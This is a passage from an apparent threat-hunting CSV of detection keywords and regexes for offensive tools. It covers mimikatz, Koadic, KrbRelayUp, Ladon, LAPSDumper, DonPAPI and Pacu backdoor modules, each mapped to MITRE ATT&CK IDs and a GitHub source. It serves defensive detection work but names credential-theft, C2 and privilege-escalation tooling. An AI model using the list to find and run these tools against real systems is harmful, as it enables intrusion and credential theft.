By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/kiwi_passwords.yar*",".{0,1000}\/kiwi_passwords\.yar.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/klezVirus/CandyPotato*",".{0,1000}\/klezVirus\/CandyPotato.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. 
This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which were lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","295","68","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" "*/knqyf263/CVE-2022-0847*",".{0,1000}\/knqyf263\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/knqyf263/CVE-2022-0847","1","1","N/A","N/A","1","47","9","2022-03-08T13:54:08Z","2022-03-08T13:48:55Z" "*/knx-gateway-discover.nse*",".{0,1000}\/knx\-gateway\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/knx-gateway-info.nse*",".{0,1000}\/knx\-gateway\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Koadic*",".{0,1000}\/Koadic.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript).
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1059.005 - T1059.007 - T1021 - T1547.001 - T1055 - T1012","TA0002 - TA0005 - TA0007 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/zerosum0x0/koadic","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/koadic.git*",".{0,1000}\/koadic\.git.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/Koh/*.cs*",".{0,1000}\/Koh\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*/Koppeling.git*",".{0,1000}\/Koppeling\.git.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*/kost/revsocks/releases*",".{0,1000}\/kost\/revsocks\/releases.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*/KrakenMask.git*",".{0,1000}\/KrakenMask\.git.{0,1000}","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","9","3","217","37","2023-11-29T21:58:34Z","2023-08-05T19:24:36Z" "*/krb5/*.py",".{0,1000}\/krb5\/.{0,1000}\.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/krb5-enum-users.nse*",".{0,1000}\/krb5\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/krbjack.git*",".{0,1000}\/krbjack\.git.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","10","1","85","15","2024-02-08T18:07:25Z","2023-04-16T10:44:55Z" "*/KrbRelay*",".{0,1000}\/KrbRelay.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*/KrbRelay.exe*",".{0,1000}\/KrbRelay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/KrbRelayUp.exe*",".{0,1000}\/KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/KrbRelayUp.git*",".{0,1000}\/KrbRelayUp\.git.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*/krbrelayx*",".{0,1000}\/krbrelayx.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "*/KRBUACBypass*",".{0,1000}\/KRBUACBypass.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","444","60","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "*/kronos.profile*",".{0,1000}\/kronos\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/kubesploit.git*",".{0,1000}\/kubesploit\.git.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*/Kubestroyer.git*",".{0,1000}\/Kubestroyer\.git.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","1","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*/L0ading-x/cve-2022-23131*",".{0,1000}\/L0ading\-x\/cve\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability
cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/L0ading-x/cve-2022-23131","1","1","N/A","N/A","1","25","12","2022-02-22T01:45:34Z","2022-02-22T01:39:52Z" "*/laconicwolf/burp-extensions*",".{0,1000}\/laconicwolf\/burp\-extensions.{0,1000}","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","139","33","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" "*/Ladon.go*",".{0,1000}\/Ladon\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*/Ladon.ps1*",".{0,1000}\/Ladon\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*/Ladon.py*",".{0,1000}\/Ladon\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*/Ladon/Ladon.*",".{0,1000}\/Ladon\/Ladon\..{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*/Ladon/obj/x86*",".{0,1000}\/Ladon\/obj\/x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*/LadonGo/*",".{0,1000}\/LadonGo\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*/lambda__backdoor_new_roles*",".{0,1000}\/lambda__backdoor_new_roles.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/lambda__backdoor_new_sec_groups*",".{0,1000}\/lambda__backdoor_new_sec_groups.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" 
"*/lambda__backdoor_new_users*",".{0,1000}\/lambda__backdoor_new_users.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/LambdaLooter.py*",".{0,1000}\/LambdaLooter\.py.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","69","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "*/lanattacks/*",".{0,1000}\/lanattacks\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/laps.py *--ldapserver*",".{0,1000}\/laps\.py\s.{0,1000}\-\-ldapserver.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","238","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" "*/laps.py *-u * -p *",".{0,1000}\/laps\.py\s.{0,1000}\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","238","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" "*/laps.py*",".{0,1000}\/laps\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/laps_dump_*.txt*",".{0,1000}\/laps_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/LAPSDumper.git*",".{0,1000}\/LAPSDumper\.git.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","10","3","238","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" "*/lastpass.py*",".{0,1000}\/lastpass\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*/Lateral/SMB.cs*",".{0,1000}\/Lateral\/SMB\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 